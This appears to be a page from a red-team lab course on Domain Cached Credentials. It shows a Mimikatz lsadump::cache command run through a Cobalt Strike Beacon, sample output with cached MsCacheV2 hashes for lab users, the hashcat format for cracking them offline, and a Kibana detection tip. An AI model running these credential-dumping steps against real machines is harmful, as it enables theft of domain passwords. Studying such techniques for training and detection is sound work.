Domain Cached Credentials

Domain Cached Credentials (DCC) was designed for instances where domain credentials are required to logon to a machine, even whilst it's disconnected from the domain (think of a roaming laptop for example). The local device caches the domain credentials so authentication can happen locally, but these can be extracted and cracked offline to recover plaintext credentials.

Unfortunately, the hash format is not NTLM so it can't be used with pass the hash. The only viable use for these is to crack them offline.

The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.

This command requires elevated privileges.

\

beacon> mimikatz !lsadump::cache

Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a

Local name : WKSTN-2 ( S-1-5-21-2281971671-4135076198-2136761646 )
Domain name : DEV ( S-1-5-21-569305411-121244042-2357301523 )
Domain FQDN : dev.cyberbotic.io

Policy subsystem is : 1.18
LSA Key(s) : 1, default {9f88abd7-1cb9-d741-372b-c883b3cbf843}
  [00] {9f88abd7-1cb9-d741-372b-c883b3cbf843} c38164900449d2c6d81b557198ab0cbda2c0ce1c9f57c717cb221032ba1adffb

* Iteration is set to default (10240)

[NL$1 - 9/1/2022 8:10:06 AM]
RID       : 00000450 (1104)
User      : DEV\bfarmer
MsCacheV2 : 98e6eec9c0ce004078a48d4fd03f2419

[NL$2 - 9/1/2022 10:29:19 AM]
RID       : 00000451 (1105)
User      : DEV\jking
MsCacheV2 : 0d50dee9ed3f29d00282168297090d2a

\

To crack these with hashcat, we need to transform them into the expected format. The example hashes page shows us it should be $DCC2$<iterations>#<username>#<hash>.

DCC is orders of magnitude slower to crack than NTLM. OPSEC This module will open a handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle" saved search in Kibana to see them.

\